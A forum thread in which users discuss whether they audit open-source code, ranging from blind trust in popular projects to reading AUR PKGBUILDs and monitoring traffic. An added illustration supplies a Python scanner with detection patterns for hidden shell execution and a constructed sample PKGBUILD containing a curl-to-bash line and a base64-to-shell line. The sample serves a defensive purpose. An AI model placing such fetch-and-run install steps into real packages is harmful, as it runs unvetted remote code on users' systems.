cross-posted from: https://lemmy.ml/post/30846701
The question is simple. I wanted to get a general consensus on whether people actually audit the code that they use from FOSS or open source software or apps.
Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?
Let’s hear it!
Lmao. I commented about this exact shit a few days ago and people in that thread were aghast that people used software without vetting. So many were so confident in the security and superiority to paid solutions.
Not really. Or only when it doesn’t do exactly what I expect.
Occasionally. Not big projects like Krita. I regularly check apps with Wireshark, most apps should be entirely offline. I also turn off internet access with flatseal.
What’s Wireshark?
It’s a packet analyzer
It’s a packet and internet analyzer. I’m mostly concerned with security issues so I constantly check packets on outgoing connections. For apps where the internet is unimportant I disable their ability to access the internet. The vast majority of security issues are solved by preventing internet access.
Occasionally a small project shows up on my radar. Usually it’s an alternative frontend for Discord, YouTube, etc. that has not-stellar security but much better than what YouTube or Discord gives you out of the box. I’ve submitted maybe 1000 detailed security issues on GitHub to small open source projects, many have been implemented 🤓
Oh I was looking for one for pc.
I quite enjoy this ability to disable internet access on Android with NetGuard and TrackerControl.
Only when convenient and if it’s not from a reputable source. I will audit random projects on GitHub but I’m not fucking auditing Firefox.
Nah. I trust open source devs with all my heart. If anything goes wrong then I’ll think about it.
I’ve worked on FOSS stuff with very large user bases and seen very obvious flaws go unnoticed for several years, so I guess most people don’t.
‘Open source’ misses the point of libre software.
Open source doesn’t care about libre software.
“I like your funny words magic man” -me when I look at code
“nobody tells me what to do” - me when I look at a “ReadMe” file which perfectly explains the cause of the problem I end up having and having to try and fix
I always appreciate a good Clone High reference.
No
Depends. I read the PKGBUILDs of all AUR packages I install at least, which is not the same as reading source code but it’s something. If it’s a very widely used piece of software I don’t bother—if all these people haven’t spotted some secret backdoor, I as a lay person am not going to be the one to spot it. I will read small things like bash scripts or in general the more “obscure” software I run will be some kind of script. But also if you’re going to publish malware in a script you’re probably obscuring the malicious function so that someone doing a preliminary read won’t spot it.
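An added illustration of the point in the comment above (not the commenter’s code): a small heuristic scan that flags the constructs a quick read of a PKGBUILD or install script tends to miss, such as decoded blobs or downloaded content piped straight into a shell. The PKGBUILD it scans is constructed for the example and is not a real AUR package.

```python
import re

# Each pattern flags a construct that hides what a script really does, so a
# skim of the file would miss it. A hit is a prompt to read the line closely,
# not proof of malice (e.g. SKIP is normal for VCS sources).
INDICATORS = [
    ("decoded blob piped to interpreter",
     re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:sudo\s+)?(?:sh|bash|python\d?|perl)\b")),
    ("remote content piped to interpreter",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:sh|bash)\b")),
    ("eval of a computed string", re.compile(r"\beval\b\s+[\"'$`]")),
    ("long escaped byte string", re.compile(r"(?:\\x[0-9a-fA-F]{2}){6,}")),
    ("plain-http source", re.compile(r"^\s*source\s*=.*\bhttp://")),
    ("checksum verification skipped", re.compile(r"^\s*(?:md5|sha\d+|b2)sums\s*=.*\bSKIP\b")),
    ("writes into user dotfiles", re.compile(r"(?:>>?|\bcp\b|\btee\b)[^|\n]*(?:\$HOME/\.|~/\.)")),
]


def scan_script(text):
    """Return (line_number, indicator) pairs for lines that deserve a close read."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):  # comment lines cannot execute anything
            continue
        for label, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


# Constructed sample, not a real AUR package: a plausible-looking PKGBUILD
# whose package() step quietly runs decoded and downloaded code.
SAMPLE_PKGBUILD = """\
# Maintainer: constructed example
pkgname=example-tool
pkgver=1.0
source=("https://example.invalid/example-tool-1.0.tar.gz")
sha256sums=('SKIP')

package() {
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  echo aGVsbG8= | base64 -d | sh
  curl -s http://example.invalid/post-install.sh | bash
}
"""

if __name__ == "__main__":
    for lineno, label in scan_script(SAMPLE_PKGBUILD):
        print(f"line {lineno}: {label}")
```

The patterns are deliberately coarse; the output is a reading list for a human, not a verdict.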
I’ve glanced over a project or two before. It’s usually less an audit, and more of a ‘what is going on in there?’ curiosity.
Though it does have the side-effect of being a low-intensity audit as well. :)
I don’t have any of the knowledge to be able to do it.
I just hope that others who do, and are interested in the app, are doing their part.
I wouldn’t say blindly, rather my heuristic is, the more long-term and popular a project is, the less I’ll bother.
If I do though get a random script from a random repository, rather than from say Debian official package manager from main contrib sources, then I will check. If it’s another repository, say Firefox from Mozilla or Blender then I won’t check but I’ll make sure it genuinely comes from there, maybe not a mirror or that the mirror does have a checksum that gets validated.
So… investment in verifying trust is roughly proportional to how little I expect others to check.
Click file “Yup, looks like code all right”
I don’t really care about low quality code as long as it’s still the best tool for the job. I blindly trust that any malicious code in popular software would quickly be called out.
The more niche, the more likely I feel like first investigating what exactly it does before I download.
Realistically I would probably not be able to tell without consulting an LLM though.
Not at all unfortunately. I’m not a programmer though.
I don’t have the fluency to detect vulnerabilities or memory leaks. I wish I did, and I’m trying to learn. Being self-taught is hard work.
But I can read bug reports and get the hint. And I check upstream sources to make sure projects are still under active development. Even occasional maintenance is better than nothing.